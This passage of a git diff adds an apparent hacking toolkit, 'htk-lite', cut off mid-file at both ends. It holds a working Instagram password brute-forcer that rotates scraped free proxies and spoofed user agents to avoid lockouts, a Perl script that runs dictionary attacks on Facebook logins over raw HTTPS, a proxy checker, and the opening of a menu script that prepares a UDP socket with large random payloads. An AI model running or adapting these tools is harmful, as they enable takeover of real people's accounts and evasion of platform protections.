AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; adidxbot/2.0; +http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)', + 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', +] + +# Browser +header = { + 'x-ig-app-id': '936619743392459', + 'x-instagram-ajax': '2f6bf8b37c04', + 'x-requested-with': 'XMLHttpRequest', + 'referer': 'https://www.instagram.com/', + 'content-type': 'application/x-www-form-urlencoded' +} + +username_field = 'username' +password_field = 'password' +home_url = 'https://www.instagram.com/' +login_url = 'https://www.instagram.com/accounts/login/ajax/' + +browser_data = { + 'header': header, + 'home_url': home_url, + 'login_url': login_url, + 'username_field': username_field, + 'password_field': password_field +} + +# Login +fetch_time = (10, 15) +response_codes = {'succeed': 0, 'failed': 1, 'locked': -1} + +# Limits +max_bad_proxies = 128 +max_time_to_wait = 18 +max_bots_per_proxy = 16 + +# Misc +debug = False +credentials = 'accounts.txt' +modes = {0: 512, 1: 256, 2: 128, 3: 64} + +# Database +db_dir = 'database' +db_session = 'session.db' +db_path = os.path.join(db_dir, db_session) + +if not os.path.exists(db_dir): + os.mkdir(db_dir) diff --git a/htk-lite/files/Instagram/lib/display.py b/htk-lite/files/Instagram/lib/display.py new file mode 100644 index 0000000..5f1a1a9 --- /dev/null +++ b/htk-lite/files/Instagram/lib/display.py @@ -0,0 +1,160 @@ +# 12/29/2018 +# Author: Mohamed +# Description: Display + +from os import system +from time import sleep +from .const import debug +from colorama import Fore +from builtins import input +from platform import system as platform + + +class Display(object): + + __is_color = None + total_lines = None + account_exists = None + + def __init__(self, username=None, passlist=None, is_color=None): + self.delay = 1.3 + self.username = username + self.passlist = passlist + self.colors_disabled = True + self.cls = 'cls' if platform() == 'Windows' else 'clear' + + if Display.__is_color == None: + Display.__is_color = is_color + + def clear(self): + if not debug or self.colors_disabled: + system(self.cls) + + if self.colors_disabled and self.__is_color: + self.colors_disabled = False + else: + print('\n\n') + + def stats(self, password, attempts, browsers, load=True): + self.clear() + complete = round((attempts/Display.total_lines) * 100, 4) + account_exists = self.account_exists if self.account_exists != None else '' + + if self.__is_color: + print('{0}[{1}-{0}] {1}Wordlist: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.passlist, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Username: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, self.username.title(), Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Password: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, password, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Complete: {2}{3}%{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, complete, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Attempts: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, attempts, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Browsers: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, browsers, Fore.RESET + )) + + print('{0}[{1}-{0}] {1}Exists: {2}{3}{4}'.format( + Fore.YELLOW, Fore.WHITE, Fore.CYAN, account_exists, Fore.RESET + )) + + else: + print( + f'[-] Wordlist: {self.passlist}\n[-] Username: {self.username}\n[-] Password: {password}') + + print( + f'Complete: {complete}\n[-] Attempts: {attempts}\n[-] Browsers: {browsers}\n[-] Exists: {account_exists}') + + if load: + sleep(self.delay) + + def stats_found(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Password Found{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + + print('{0}[{1}+{0}] {2}Username: {1}{3}{4}'.format( + Fore.YELLOW, Fore.GREEN, Fore.WHITE, self.username.title(), Fore.RESET + )) + + print('{0}[{1}+{0}] {2}Password: {1}{3}{4}'.format( + Fore.YELLOW, Fore.GREEN, Fore.WHITE, password, Fore.RESET + )) + else: + print('\n[!] Password Found\n[+] Username: {}\n[+] Password: {}'.format( + self.username.title(), password + )) + + sleep(self.delay) + + def stats_not_found(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Password Not Found{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + else: + print('\n[!] Password Not Found') + + sleep(self.delay) + + def shutdown(self, password, attempts, browsers): + self.stats(password, attempts, browsers, load=False) + + if self.__is_color: + print('\n{0}[{1}!{0}] {2}Shutting Down ...{3}'.format( + Fore.YELLOW, Fore.RED, Fore.WHITE, Fore.RESET + )) + else: + print('\n[!] Shutting Down ...') + + sleep(self.delay) + + def info(self, msg): + self.clear() + + if self.__is_color: + print('{0}[{1}i{0}] {2}{3}{4}'.format( + Fore.YELLOW, Fore.CYAN, Fore.WHITE, msg, Fore.RESET + )) + else: + print('[i] {}'.format(msg)) + + sleep(2.5) + + def warning(self, msg): + self.clear() + + if self.__is_color: + print('{0}[{1}!{0}] {1}{2}{3}'.format( + Fore.YELLOW, Fore.RED, msg, Fore.RESET + )) + else: + print('[!] {}'.format(msg)) + + sleep(self.delay) + + def prompt(self, data): + self.clear() + + if self.__is_color: + return input('{0}[{1}?{0}] {2}{3}{4}'.format( + Fore.YELLOW, Fore.CYAN, Fore.WHITE, data, Fore.RESET + )) + else: + return input('[?] {}'.format(data)) diff --git a/htk-lite/files/Instagram/lib/password_manager.py b/htk-lite/files/Instagram/lib/password_manager.py new file mode 100644 index 0000000..d10c83e --- /dev/null +++ b/htk-lite/files/Instagram/lib/password_manager.py @@ -0,0 +1,108 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Password manager + +from time import sleep +from hashlib import sha256 +from sys import version_info +from lib.display import Display +from lib.session import Session + + +class PasswordManager(object): + + def __init__(self, username, passlist_path, max_passwords, display): + self.passlist = [] + self.session = None + self.resume = False + self.is_alive = True + self.is_read = False + self.display = display + self.fingerprint = None + self.username = username + self.passwords_removed = 0 + self.passlist_path = passlist_path + self.max_passwords = max_passwords + Display.total_lines = self.count_lines() + + @property + def list_size(self): + return len(self.passlist) + + def list_add(self, password): + if not password in self.passlist: + self.passlist.append(password) + + def list_remove(self, password): + if password in self.passlist: + self.attempts += 1 + self.passlist.pop(self.passlist.index(password)) + self.session.write(self.attempts, self.passlist) + + def count_lines(self): + lines = 0 + + fingerprint = sha256( + self.username.lower().strip().encode() + ).hexdigest().encode() + + self.display.info('Reading wordlist ...') + + with open(self.passlist_path, 'rb') as f: + + for data in f: + lines += 1 + chunk = sha256(data).hexdigest().encode() + fingerprint = sha256(fingerprint + chunk).hexdigest().encode() + + self.fingerprint = fingerprint + self.session = Session(self.fingerprint) + + return lines + 1 + + def read(self): + attempts = 0 + with open(self.passlist_path, 'rt', encoding='utf-8') as passlist: + + for password in passlist: + if not self.is_alive: + break + + if self.resume: + self.attempts, self.passlist = self.session.read() + + if attempts < (self.attempts + self.list_size): + attempts += 1 + continue + else: + self.resume = False + + password = password.replace('\n', '').replace( + '\r', '').replace('\t', '') + + if self.list_size < self.max_passwords: + self.list_add(password) + else: + while self.list_size >= self.max_passwords and self.is_alive: + sleep(0.5) + + if self.is_alive: + self.list_add(password) + self.session.write(self.attempts, self.passlist) + + if self.is_alive: + self.is_read = True + + @property + def attempts(self): + return self.passwords_removed + + @attempts.setter + def attempts(self, n): + self.passwords_removed = n + + def start(self): + self.read() + + def stop(self): + self.is_alive = False diff --git a/htk-lite/files/Instagram/lib/proxy.py b/htk-lite/files/Instagram/lib/proxy.py new file mode 100644 index 0000000..02281d5 --- /dev/null +++ b/htk-lite/files/Instagram/lib/proxy.py @@ -0,0 +1,26 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy + + +class Proxy(object): + + def __init__(self, proxy): + self.proxy = proxy + + @property + def ip(self): + return self.proxy['ip'] + + @property + def port(self): + return self.proxy['port'] + + @property + def country(self): + return self.proxy['country'] + + @property + def addr(self): + addr = '{}:{}'.format(self.proxy['ip'], self.proxy['port']) + return {'http': addr, 'https': addr} diff --git a/htk-lite/files/Instagram/lib/proxy_list.py b/htk-lite/files/Instagram/lib/proxy_list.py new file mode 100644 index 0000000..3cbe104 --- /dev/null +++ b/htk-lite/files/Instagram/lib/proxy_list.py @@ -0,0 +1,18 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: A list that will manage proxies + + +class ProxyList(object): + + def __init__(self): + self.list = [] + + def __contains__(self, proxy): + for _proxy in self.list: + if _proxy.ip == proxy['ip'] and _proxy.port == proxy['port']: + return True + return False + + def append(self, proxy): + self.list.append(proxy) \ No newline at end of file diff --git a/htk-lite/files/Instagram/lib/proxy_manager.py b/htk-lite/files/Instagram/lib/proxy_manager.py new file mode 100644 index 0000000..6bf3ee4 --- /dev/null +++ b/htk-lite/files/Instagram/lib/proxy_manager.py @@ -0,0 +1,42 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy manager + +from time import sleep +from queue import Queue +from .scraper import Scraper +from .bad_proxies import BadProxies + + +class ProxyManager(object): + + def __init__(self): + self.is_alive = True + self.proxies = Queue() + self.scraper = Scraper() + self.bad_proxies = BadProxies() + + def collect(self): + while self.is_alive: + if not self.proxies.qsize(): + + for proxy in self.scraper.proxies: + if not proxy in self.bad_proxies: + self.proxies.put(proxy) + + sleep(5) + + def bad_proxy(self, proxy): + if not proxy in self.bad_proxies: + self.bad_proxies.append(proxy) + + def get_proxy(self): + if self.proxies.qsize(): + return self.proxies.get() + + def start(self): + self.collect() + + def stop(self): + self.is_alive = False + self.scraper.is_alive = False \ No newline at end of file diff --git a/htk-lite/files/Instagram/lib/scraper.py b/htk-lite/files/Instagram/lib/scraper.py new file mode 100644 index 0000000..529d249 --- /dev/null +++ b/htk-lite/files/Instagram/lib/scraper.py @@ -0,0 +1,123 @@ +# Date: 12/28/2018 +# Author: Mohamed +# Description: Proxy scraper + +from time import sleep +from requests import get +from .proxy import Proxy +from random import randint +from .display import Display +from .proxy_list import ProxyList +from bs4 import BeautifulSoup as bs +from threading import Thread, RLock +from .const import fetch_time, debug + + +class Scraper(object): + + def __init__(self): + self.lock = RLock() + self.is_alive = True + self.display = Display() + self.scraped_proxies = [] + self.extra_proxies_link = 'http://spys.me/proxy.txt' + + self.links = [ + 'https://sslproxies.org', + 'https://free-proxy-list.net', + 'https://free-proxy-list.net/anonymous-proxy.html' + ] + + def parse_extra_proxy(self, proxy): + proxy = proxy.split(' ') + addr = proxy[0].split(':') + + return { + 'ip': addr[0], + 'port': addr[1], + 'country': proxy[1].split('-')[0] + } + + def parse_proxy(self, proxy): + proxy = proxy.find_all('td') + if proxy[4].string != 'transparent' and proxy[5].string != 'transparent': + return { + 'ip': proxy[0].string, + 'port': proxy[1].string, + 'country': proxy[3].string + } + + def scrape_proxies(self, link): + proxies = [] + + try: + proxies = bs(get(link, timeout=fetch_time).text, + 'html.parser').find('tbody').find_all('tr') + except: + pass + + if not proxies: + with self.lock: + if self.is_alive and debug: + self.display.warning( + 'Failed to grab proxies from {}'.format(link)) + + for proxy in proxies: + with self.lock: + _proxy = self.parse_proxy(proxy) + if _proxy: + self.scraped_proxies.append(_proxy) + + def scrape_extra_proxies(self): + proxies = [] + + try: + if self.is_alive: + proxies = get(self.extra_proxies_link, + timeout=fetch_time).text.split('\n') + except: + pass + + if not proxies: + with self.lock: + if self.is_alive and debug: + self.display.warning( + 'Failed to grab proxies from {}'.format(self.extra_proxies_link)) + + for proxy in proxies: + if '-H' in proxy and '-S' in proxy: + with self.lock: + self.scraped_proxies.append(self.parse_extra_proxy(proxy)) + + @property + def proxies(self): + proxy_list = ProxyList() + + threads = [] + threads = [Thread(target=self.scrape_proxies, args=[link]) + for link in self.links] + threads.append(Thread(target=self.scrape_extra_proxies)) + + index = 0 + while index < len(threads) and self.is_alive: + thread = threads[index] + + try: + thread.daemon = True + thread.start() + index += 1 + except: + sleep(0.5) + + while self.is_alive and len(threads): + for thread in [thread for thread in threads if not thread.is_alive()]: + threads.pop(threads.index(thread)) + sleep(0.5) + + if self.is_alive: + for proxy in self.scraped_proxies: + + if not proxy in proxy_list: + proxy_list.append(Proxy(proxy)) + + return [proxy_list.list.pop(randint(0, len(proxy_list.list)-1)) for _ in range(len(proxy_list.list))] diff --git a/htk-lite/files/Instagram/lib/session.py b/htk-lite/files/Instagram/lib/session.py new file mode 100644 index 0000000..91fd976 --- /dev/null +++ b/htk-lite/files/Instagram/lib/session.py @@ -0,0 +1,106 @@ +# Date: 05/05/2018 +# Author: Mohamed +# Description: Session Handler + +import json +import sqlite3 +from os import remove +from sys import version_info +from lib.const import db_path +from os.path import exists as path +from csv import DictWriter, DictReader + + +class DatabaseWrapper: + + def __init__(self, db_name): + self.db_name = db_name + + def db_query(self, cmd, args=[], fetchone=True): + database = sqlite3.connect(self.db_name) + sql = database.cursor().execute(cmd, args) + data = sql.fetchone()[0] if fetchone else sql.fetchall() + database.close() + return data + + def db_execute(self, cmd, args=[]): + database = sqlite3.connect(self.db_name) + database.cursor().execute(cmd, args) + database.commit() + database.close() + + +class Session(DatabaseWrapper): + + is_busy = False + + def __init__(self, fingerprint): + super().__init__(db_path) + self.fingerprint = fingerprint + self.create_tables() + + def create_tables(self): + self.db_execute(''' + CREATE TABLE IF NOT EXISTS + Session( + session_id TEXT, + attempts INTEGER, + list TEXT, + + PRIMARY KEY(session_id) + ); + ''') + + @property + def exists(self): + return self.db_query('SELECT COUNT(*) FROM Session WHERE session_id=?;', [self.fingerprint]) + + def read(self): + + if not self.exists: + return 0, [] + + attempts, list = self.db_query(''' + SELECT attempts, list + FROM Session + WHERE session_id=? + ''', args=[self.fingerprint], fetchone=False)[0] + + return attempts, json.loads(list) + + def _write(self, attempts, _list): + + if not self.exists: + self.db_execute(''' + INSERT INTO Session(session_id, attempts, list) + VALUES(?, ?, ?); + ''', args=[self.fingerprint, attempts, json.dumps(_list)]) + return + + self.db_execute(''' + UPDATE Session + SET attempts=?, list=? + WHERE session_id=?; + ''', args=[attempts, json.dumps(_list), self.fingerprint]) + + def write(self, attempts, _list): + if not attempts: + return + + while Session.is_busy: + pass + + try: + Session.is_busy = True + self._write(attempts, _list) + except: + pass + finally: + Session.is_busy = False + + def delete(self): + if self.exists: + self.db_execute(''' + DELETE FROM Session + WHERE session_id=?; + ''', args=[self.fingerprint]) diff --git a/htk-lite/files/Instagram/requirements.txt b/htk-lite/files/Instagram/requirements.txt new file mode 100644 index 0000000..d86bc64 --- /dev/null +++ b/htk-lite/files/Instagram/requirements.txt @@ -0,0 +1,4 @@ +bs4 +future +requests +colorama diff --git a/htk-lite/files/Instagram/test_proxies.py b/htk-lite/files/Instagram/test_proxies.py new file mode 100644 index 0000000..bc95120 --- /dev/null +++ b/htk-lite/files/Instagram/test_proxies.py @@ -0,0 +1,138 @@ +''' +Date: 3/15/2019 +Author: Mohamed +Description: Reads a file that contains a list of proxies and determines whether or not that list is good. + Each line in the file must be in the format of ip:port +''' + +import platform +from os import system +from time import sleep +from requests import Session +from threading import Thread, RLock + +proxy_list = 'proxies.txt' +target_site = 'https://instagram.com' + + +def get_proxies(): + proxies = [] + + with open(proxy_list, 'rt', encoding='utf-8') as proxies_file: + + for line in proxies_file: + if not line: + continue + + ip, port = line.replace('\r', '').split(':') + + port = int(port) + proxy = {'ip': ip, 'port': port} + proxies.append(proxy) + + return proxies + + +class TestProxies: + + def __init__(self, proxies): + self.worked = 0 + self.failed = 0 + self.lock = RLock() + self.active_brs = 0 + self.is_alive = True + self.proxies = proxies + self.total = len(proxies) + self.test_link = target_site + + def display(self): + system('cls' if platform.system() == 'Windows' else 'clear') + worked, failed, total = self.worked, self.failed, self.total + + worked_per = round((worked/total) * 100, 2) + failed_per = round((failed/total) * 100, 2) + complete = round(worked_per + failed_per, 2) + + print(f'Complete: {complete}%') + print(f'Active browsers: {self.active_brs}') + print(f'Proxies worked: {worked_per}% [{worked}]') + print(f'Proxies failed: {failed_per}% [{failed}]') + + def test_proxy(self, proxy): + br = Session() + + addr = '{}:{}'.format(proxy['ip'], proxy['port']) + addr = {'http': addr, 'https': addr} + br.proxies.update(addr) + + try: + br.get(self.test_link, timeout=(10, 15)) + + with self.lock: + self.worked += 1 + except: + with self.lock: + self.failed += 1 + finally: + br.close() + + if self.is_alive: + with self.lock: + self.display() + + self.active_brs -= 1 + + def start(self): + for proxy in self.proxies: + + while self.is_alive and self.active_brs >= 512: + pass + + if not self.is_alive: + break + + with self.lock: + self.active_brs += 1 + + Thread(target=self.test_proxy, args=[proxy], daemon=True).start() + + while self.is_alive and self.active_brs: + sleep(0.5) + + self.display() + + def stop(self): + self.is_alive = False + + while self.active_brs: + try: + with self.lock: + self.display() + + sleep(0.5) + except KeyboardInterrupt: + break + + def examine(self): + failed = self.failed / self.total + worked = self.worked / self.total + + if worked == 0: + print('Bad proxy list') + elif (failed - worked) >= 0.1: + print('Bad proxy list') + elif (failed - worked) == 0: + print('Bad proxy list') + else: + print('Good proxy list') + + +if __name__ == '__main__': + test_proxies = TestProxies(get_proxies()) + + try: + test_proxies.start() + except KeyboardInterrupt: + test_proxies.stop() + finally: + test_proxies.examine() diff --git a/htk-lite/files/fb-brute.pl b/htk-lite/files/fb-brute.pl new file mode 100644 index 0000000..4568e6d --- /dev/null +++ b/htk-lite/files/fb-brute.pl @@ -0,0 +1,124 @@ +#!/usr/bin/perl +# +# Bruteforce-Facebook +# +# Description: +# Imad'Ox Cracker is a password cracking tool written in perl to perform a dictionary-based attack on a specific Facebook user through HTTPS. +# +# Usage: +# perl Imad'Ox-Bruter.pl login wordlist +# login could be either a user's email address or profile name +# +# Module Requirements: +# +# Install module if missing: +# perl -MCPAN -e 'install Net::SSLeay' +# +# Demo: +# perl Imad'Ox-Bruter.pl Facebooklogin@facebook.com wordlist.lst +# +# --- Imad'Ox-Bruter Facebook password cracking tool +# --- By Imad'Ox Hunter +# --- www.facebook.com/imad.elouajib +# +# [+] Cracking Facebooklogin@facebook.com ... +# +# [-] test -> Failed +# [-] test123 -> Failed +# [-] testtest -> Failed +# [-] testest123 -> Failed +# [-] qwerty -> Failed +# [-] azerty -> Failed +# [-] password -> Failed +# [-] password123 -> Failed +# +######################################################## +# [+] CRACKED! Your password is P@$$W0RD +######################################################## +# + +use strict; +use Net::SSLeay::Handle; + +if(!defined($ARGV[0] && $ARGV[1])) { + +system('clear'); +print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n"; +print "+++ Coded by Imad'Ox-Hunter\n"; +print "+++ www.fb.com/imad.elouajib\n\n"; +print "+++ Usage: perl $0 login wordlist\n\n"; +exit; } + +my $user = $ARGV[0]; +my $wordlist = $ARGV[1]; + +open (LIST, $wordlist) || die "\n[-] No Wordlist On $wordlist -_- \n"; + +print "\n+++ Imad'Ox-Bruter Facebook password Bruter\n"; +print "+++ Coded by Imad'Ox-Hunter\n"; +print "+++ www.fb.com/imad.elouajib\n"; +print "\n[+] Now Cracking $user ...\n\n"; + +while (my $password = ) { +chomp ($password); +$password =~ s/([^^A-Za-z0-9\-_.!~*'()])/ sprintf "%%%0x", ord $1 /eg; + +my $a = "POST /login.php HTTP/1.1"; +my $b = "Host: www.facebook.com"; +my $c = "Connection: close"; +my $e = "Cache-Control: max-age=0"; +my $f = "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; +my $g = "Origin: https://www.facebook.com"; +my $h = "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31"; +my $i = "Content-Type: application/x-www-form-urlencoded"; +my $j = "Accept-Encoding: gzip,deflate,sdch"; +my $k = "Accept-Language: en-US,en;q=0.8"; +my $l = "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3"; + +my $cookie = "cookie: datr=80ZzUfKqDOjwL8pauwqMjHTa"; +my $post = "lsd=AVpD2t1f&display=&enable_profile_selector=&legacy_return=1&next=&profile_selector_ids=&trynum=1&timezone=300&lgnrnd=031110_Euoh&lgnjs=1366193470&email=$user&pass=$password&default_persistent=0&login=Log+In"; +my $cl = length($post); +my $d = "Content-Length: $cl"; + + +my ($host, $port) = ("www.facebook.com", 443); + +tie(*SSL, "Net::SSLeay::Handle", $host, $port); + + +print SSL "$a\n"; +print SSL "$b\n"; +print SSL "$c\n"; +print SSL "$d\n"; +print SSL "$e\n"; +print SSL "$f\n"; +print SSL "$g\n"; +print SSL "$h\n"; +print SSL "$i\n"; +print SSL "$j\n"; +print SSL "$k\n"; +print SSL "$l\n"; +print SSL "$cookie\n\n"; + +print SSL "$post\n"; + +my $success; +while(my $result = ){ +if($result =~ /Location(.*?)/){ +$success = $1; +} +} +if (!defined $success) +{ +print "[-] Trying -> $password \n"; +close SSL; +} +else +{ +print "\n########################################################\n"; +print "[+] Password Cracked => $password \n"; +print "########################################################\n\n"; +close SSL; +exit; +} +} diff --git a/htk-lite/htkl.py b/htk-lite/htkl.py new file mode 100644 index 0000000..27b9b8d --- /dev/null +++ b/htk-lite/htkl.py @@ -0,0 +1,1899 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ▒░▒ ▒▒ ▓▒█ ░▒ ▒ ░▒ ▒▒ ▓▒ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +import smtplib +import random +import requests +import os +import sys +import socks +import socket +import readline +import time +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) + +os.system("printf '\e[8;27;100t'") +os.system("printf '\033]2;Hackers-Tool-Kit-Lite | HTK-Lite | @tuf_unkn0wn\a'") + +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +BD = '\033[1m' + +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +banner3list = [red, blue, green, purple] +inputlist = ['☢', '☣', '☠', '♠', '❖', '⚛', '☘', '♞', '⚄', '⚒', '⚓', '⚔', '⬖', '⬗', '⬘', '⬙'] + + +def starting(): + os.system("service tor start") + os.system("service postgresql start") + + os.system("clear") + + for x in range(5): + + print(random.choice(colorlist) + "##########") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++########") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++++######") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++++++####") + + time.sleep(0.1) + + os.system("clear") + + print(random.choice(colorlist) + "++++++++##") + + time.sleep(0.1) + + os.system("clear") + + + + + +def mainbanner1(): + print """\033[1;36m + ┬ ┬┌┬┐┌─┐\033[0m + │ │ │ ├┤ \033[1;36m + ┴─┘┴ ┴ └─┘ \033[0m +██╗ ██╗████████╗██╗ ██╗ +██║ ██║╚══██╔══╝██║ ██╔╝\033[1;36m +███████║ ██║ █████╔╝ \033[0m +██╔══██║ ██║ ██╔═██╗ +██║ ██║ ██║ ██║ ██╗ +╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ + \n""".decode('utf-8') + +def mainbanner2(): + print """ + ░░▒█████████ + ▒▓▓█████████████ + ░▓█████████████████████░ ░▒███▓ + ░▓██████████████████████████████████ + ░░▒▓▓▓███████████┬ ┬┌┬┐┌─┐████████████▓ + ░▓██████▓▓██████████│ │ │ ├┤ █████████████▓░ + ░▓██████▓███████▓██████┴─┘┴ ┴ └─┘████████████████░ + ░░▒░░░░▒▒▒▓▓░░▒███████████████████████████▓▓▓░ + ░░░▒░░░▒▓▓▒░▒▒░▒▓████████▓▓██▒▒░ + ░▒░░░░░░▒░░░░░░░ + \n""".decode('utf-8') + +def mainbanner3(): + print """ +╔═══════════════════════════════════════════════╗ +║ ║ +║ {0} ██░ ██ ▄▄▄█████▓ ██ ▄█▀ ██▓ \033[0m ║ +║ {1} ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ ▓██▒ \033[0m ║ +║ {2} ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ ▒██░ \033[0m ║ +║ {3} ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ ▒██░ \033[0m║ +║ {4} ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄░██████▒ \033[0m║ +║ {5} ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒░ ▒░▓ ░ \033[0m║ +║ {6} ▒ ░▒░ ░ ░ ░ ░▒ ▒░░ ░ ▒ ░ \033[0m║ +║ {7} ░ ░░ ░ ░ ░ ░░ ░ ░ ░ \033[0m║ +║ {8} ░ ░ ░ ░ ░ ░ ░ \033[0m║ +║ ║ +║ ║ +╚═══════════════════════════════════════════════╝ + """.decode('utf-8').format(random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list), random.choice(banner3list)) + +def mainbanner4(): + print """\033[0m +████████████████████████████████████████████████████████████████████████████\033[91m +███ ███████ ██ █ ███ ███████ ████████ ██ ████████████\033[33m +████ ███████ ██████ █████ ██ █████████ █ █ █████████ ██ ██ ██████ ███\033[93m +████ █████ ███████ ██████ █████████████ ████████ ███ █████ ████\033[92m +████ ██████ █████ █████████████ ██████ █ █ ██ ██ █ █████ ███\033[94m +████ █████ ███████ ██████ █████████████ █████████ ████ ███ ███\033[1;36m +████ ███████ ███████ ██████ ██ ███████████ █████ ███ ████ ██ █ █████████\033[95m +███ █████ █████ ████ ███ ████████ ██ ███ ████ ███\033[0m +████████████████████████████████████████████████████████████████████████████ + \033[0m\n""".decode('utf-8') + +def mainbanner5(): + print """\033[92m + + █ ▄ ▄ █ ▄███▄ ▄██ ▄███▀ + ███ ███ ▄█████████▄ ███▐██▀ + ███ ███ ██▀▀███▀▀██ █████▀ + ███▄▄▄▄███ ▀ ███ ▀ ██████▄ + ███▀▀▀▀███ ▄ ███ ▄ ███▐██▄ + ███ ███ \033[0m┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ \033[92m███ \033[0m┌─┐┌─┐┬ \033[92m███ ▀███▄ \033[0m┬┌┬┐\033[92m + ███ ███ \033[0m├─┤│ ├┴┐├┤ ├┬┘└─┐ \033[92m███ \033[0m│ ││ ││ \033[92m███ ██ \033[0m│ │ \033[92m + █ █ \033[0m┴ ┴└─┘┴ ┴└─┘┴└─└─┘ \033[92m▀███▀ \033[0m└─┘└─┘┴─┘ \033[92m▀ ▀ \033[0m┴ ┴\033[92m + + + + ███ + █ █ + █ █ ██ ████████ ███████ + █ █ ██ ██ ██ + █ █ ██ ██ █████ + █ █ ▄ ██ ██ ██ + █████▄▄██ ██ ██ ███████ + + + """.decode('utf-8') + +def mainbanner6(): + print """ + • \033[35m▄█\033[0m . \033[35m█▄ \033[0m. \033[35m███ \033[0m. • \033[35m▄█ ▄█▄\033[0m. \033[35m▄█ \033[0m• + \033[35m█#█ █#█\033[0m• \033[35m▀████=████▄\033[0m. \033[35m███ ▄█ █▀ █⇣█ \033[0m. +. \033[35m█#█ \033[0m. •\033[35m█#█ \033[0m. \033[35m▀█-█▀▀██ \033[0m.\033[35m█ █▐ █▀ \033[0m• \033[35m█L█ \033[0m. + \033[35m▄███▄▄▄▄███▄▄ \033[0m. \033[35m█▪█ \033[0m. \033[35m▀ ▄█████▀ \033[0m.\033[35m█i█ +▀▀█+█▀▀▀▀█+█▀ \033[0m• \033[35m█▪█ \033[0m. \033[35m▀▀█ █ █▄\033[0m. \033[35m█t█ \033[0m. + .\033[35m█•█ \033[0m. \033[35m█•█ \033[0m. \033[35m█▪█ \033[0m• \033[35m███▐ █▄ \033[0m. \033[35m█e█ \033[0m. + \033[35m█+█ █+█ \033[0m. 